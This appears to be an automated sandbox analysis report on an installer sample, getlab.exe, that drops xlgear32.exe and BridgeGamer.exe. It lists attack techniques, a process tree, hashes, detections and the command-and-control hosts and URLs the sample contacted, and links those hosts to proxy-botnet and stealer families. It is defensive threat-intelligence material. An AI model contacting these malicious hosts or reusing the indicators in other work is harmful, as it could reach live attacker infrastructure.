                    Persistence: 1 DLL Side-Loading | 5 Windows Service | 1 Bootkit | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron | Launchd
                    Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 DLL Side-Loading | 1 Access Token Manipulation | 5 Windows Service | 12 Process Injection | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron | Launchd
                    Defense Evasion: 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 21 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 121 Virtualization/Sandbox Evasion | 1 Access Token Manipulation | 12 Process Injection | 1 Bootkit | Dynamic API Resolution | Stripped Payloads
                    Credential Access: 1 Input Capture | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing | Input Capture
                    Discovery: 1 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 35 System Information Discovery | 151 Security Software Discovery | 1 Process Discovery | 121 Virtualization/Sandbox Evasion | 11 Application Window Discovery | 3 System Owner/User Discovery | 1 Remote System Discovery | 1 System Network Configuration Discovery
                    Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot | Software Deployment Tools
                    Collection: 1 Archive Collected Data | 1 Input Capture | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging | Remote Data Staging
                    Command and Control: 2 Ingress Tool Transfer | 2 Encrypted Channel | 1 Non-Standard Port | 2 Non-Application Layer Protocol | 112 Application Layer Protocol | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols | Mail Protocols
                    Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Exfiltration Over Unencrypted Non-C2 Protocol
                    Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement | Firmware Corruption
Behavior Graph ID: 1565505, Sample: getlab.exe, Start date: 30/11/2024, Architecture: WINDOWS, Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
Process tree (recovered from the behavior graph):
• getlab.exe (started)
  • dropped: C:\Users\user\AppData\Local\...\getlab.tmp, PE32
  • getlab.tmp (started)
    • dropped: C:\Users\user\AppData\Local\...\xlgear32.exe, PE32
    • dropped: C:\Users\user\AppData\...\unins000.exe (copy), PE32
    • dropped: C:\Users\user\AppData\Local\...\is-UJ38T.tmp, PE32
    • dropped: 17 other files (10 malicious)
    • xlgear32.exe (started)
      • DNS/IP: ayeyoji.ru 185.208.158.202, ports 49736, 49746, 49752, SIMPLECARRER2IT, Switzerland
      • DNS/IP: 89.105.201.183, ports 2023, 49737, 49745, NOVOSERVE-ASNL, Netherlands
      • dropped: C:\ProgramData\BridgeGamer\sqlite3.dll, PE32
      • dropped: C:\ProgramData\BridgeGamer\BridgeGamer.exe, PE32
    • net.exe (started)
      • conhost.exe (started)
      • net1.exe (started)

Source | Detection | Scanner | Label | Link
getlab.exe | 18% | ReversingLabs | Win32.Trojan.Munp |
getlab.exe | 37% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\ProgramData\BridgeGamer\BridgeGamer.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\BridgeGamer\sqlite3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\XLGear 3.1.3.157\sqlite3.dll (copy) | 0% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958 | 0% | Avira URL Cloud | safe |
https://www.easycutstudio.com/support.html | 0% | Avira URL Cloud | safe |
ayeyoji.ru | 0% | Avira URL Cloud | safe |
http://www.zldo.narod.ru/plugins.html | 0% | Avira URL Cloud | safe |
http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 | 0% | Avira URL Cloud | safe |
http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ayeyoji.ru | 185.208.158.202 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
ayeyoji.ru | true | Avira URL Cloud: safe | unknown
http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 | true | Avira URL Cloud: safe | unknown
http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958 | xlgear32.exe, 00000004.00000002.2937621128.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937742375.000000000345C000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.innosetup.com/ | getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | false | | high
http://www.remobjects.com/psU | getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | false | | high
http://www.remobjects.com/ps | getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | false | | high
https://www.easycutstudio.com/support.html | getlab.exe, 00000000.00000002.2936190021.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676529645.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676461165.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678285601.0000000003110000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936078014.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678355074.0000000002168000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936394282.0000000002168000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.208.158.202/ | xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d | xlgear32.exe, 00000004.00000002.2936299565.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.zldo.narod.ru/plugins.html | getlab.tmp, 00000001.00000002.2936760839.00000000059A3000.00000004.00001000.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000000.1689308145.00000000004CA000.00000002.00000001.01000000.00000008.sdmp, BridgeGamer.exe.4.dr, is-S3UFM.tmp.1.dr, xlgear32.exe.1.dr | false | Avira URL Cloud: safe | unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.208.158.202 | ayeyoji.ru | Switzerland | 34888 | SIMPLECARRER2IT | true
89.105.201.183 | unknown | Netherlands | 24875 | NOVOSERVE-ASNL | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1565505
                                Start date and time:2024-11-30 02:32:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 4s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:getlab.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/31@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 196
                                • Number of non-executed functions: 269
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:33:32 | API Interceptor | 557977x Sleep call for process: xlgear32.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.208.158.202 | file.exe | Get hash | malicious | Nymaim, Socks5Systemz | Browse |
185.208.158.202 | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
185.208.158.202 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | gxjIKuKnu7.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | BJqvg1iEdr.exe | Get hash | malicious | Socks5Systemz | Browse |
185.208.158.202 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar | Browse |
89.105.201.183 | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse | 404
89.105.201.183 | N6jsQ3XNNX.exe | Get hash | malicious | Socks5Systemz | Browse | 200
89.105.201.183 | cv viewer plugin 8.31.40.exe | Get hash | malicious | Socks5Systemz | Browse | 200
                                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SIMPLECARRER2IT | chutmarao.ps1 | Get hash | malicious | RHADAMANTHYS | Browse | 185.196.8.68
SIMPLECARRER2IT | RjygH3Vh7O.exe | Get hash | malicious | RHADAMANTHYS | Browse | 185.196.8.68
SIMPLECARRER2IT | SekpL8Z26C.exe | Get hash | malicious | Unknown | Browse | 185.208.159.79
SIMPLECARRER2IT | file.exe | Get hash | malicious | Unknown | Browse | 185.208.159.79
SIMPLECARRER2IT | file.exe | Get hash | malicious | Unknown | Browse | 185.208.159.79
SIMPLECARRER2IT | file.exe | Get hash | malicious | Nymaim, Socks5Systemz | Browse | 185.208.158.202
SIMPLECARRER2IT | http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.com | Get hash | malicious | HTMLPhisher | Browse | 185.208.158.251
SIMPLECARRER2IT | 0a0#U00a0.js | Get hash | malicious | RHADAMANTHYS | Browse | 185.196.8.68
SIMPLECARRER2IT | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
SIMPLECARRER2IT | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.208.158.202
NOVOSERVE-ASNL | file.exe | Get hash | malicious | Nymaim, Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 89.105.201.183
NOVOSERVE-ASNL | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | gxjIKuKnu7.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | BJqvg1iEdr.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
NOVOSERVE-ASNL | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar | Browse | 89.105.201.183
                                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\BridgeGamer\sqlite3.dll | file.exe | Get hash | malicious | Nymaim, Socks5Systemz | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | file.exe | Get hash | malicious | Socks5Systemz | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | file.exe | Get hash | malicious | Socks5Systemz | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | OXrZ6fj4Hq.exe | Get hash | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | IrAr85Qv7X.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | 8BQ2v9glrG.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | BBiIn5gqhd.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | gacut_837143941.exe | Get hash | malicious | Unknown | Browse |
C:\ProgramData\BridgeGamer\sqlite3.dll | WTsvUl9X8N.exe | Get hash | malicious | Oski Stealer, Vidar | Browse |
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501949315581084
                                                                        Encrypted:false
                                                                        SSDEEP:49152:jcpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:jSp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:9DC53D054BB2482253850DA5D8DFF405
                                                                        SHA1:F6E82BED4CA68946DC87B172D9E9AB51AB38084A
                                                                        SHA-256:07D66DC4FF91DA57222F880EFEF718EDE491777EA387EE09D3E26B2CAAB7DDB2
                                                                        SHA-512:249A4782254286B6A0D999720FB62DCCA616AC21BD5267377514940C22FB5D1F20F12FA9E00577258DDD5EF7B782D945716A1C118BB56320309C9C7A75E77441
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\BridgeGamer\BridgeGamer.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: OXrZ6fj4Hq.exe, Detection: malicious, Browse
                                                                        • Filename: IrAr85Qv7X.exe, Detection: malicious, Browse
                                                                        • Filename: 8BQ2v9glrG.exe, Detection: malicious, Browse
                                                                        • Filename: BBiIn5gqhd.exe, Detection: malicious, Browse
                                                                        • Filename: gacut_837143941.exe, Detection: malicious, Browse
                                                                        • Filename: WTsvUl9X8N.exe, Detection: malicious, Browse
                                                                        Reputation:high, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):2.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:8C/ll:8CX
                                                                        MD5:0D0A6EA34B267869C1DD64F9AD4584C2
                                                                        SHA1:F7A99108740EEA61E2F3C46B989E18648C038E14
                                                                        SHA-256:AA7D7191AA5A80BA1BE7EE4BA60FF2EC593B8C5EF1EC0E88E5E546DF7BDD19F0
                                                                        SHA-512:7B093076A3F26D79AC8245F76A0955C621F2BDBFB35B77CAD8FA774D723C6FD4A4243321D1F2B0E71A8D5C14B4B5AB8BA1D0FEC869E180EF923C308AAA3FC2D0
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.kJg....
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:xln:j
                                                                        MD5:B15762FC4C227BBDB97385765FB475F4
                                                                        SHA1:3B5022C8251B22D81FB9EC294C5197E0BDDD9BD4
                                                                        SHA-256:32434DC5B0F72C9B863C24DAA5D4E79B9C43BD73B38C469FB65FD13D996B7B32
                                                                        SHA-512:3F335DDBB7830D09C4504ED9000CC9E3BA8CC14E8252446698147C9B9F52C245C744ED5C7882A78E73D002C682CF98B9BF77D87990D392833618DBDCB20C838A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:,...
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):2.9545817380615236
                                                                        Encrypted:false
                                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                        Malicious:false
                                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                        Process:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):1.7095628900165245
                                                                        Encrypted:false
                                                                        SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                        MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                        SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                        SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                        SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                        Malicious:false
                                                                        Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\getlab.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704000
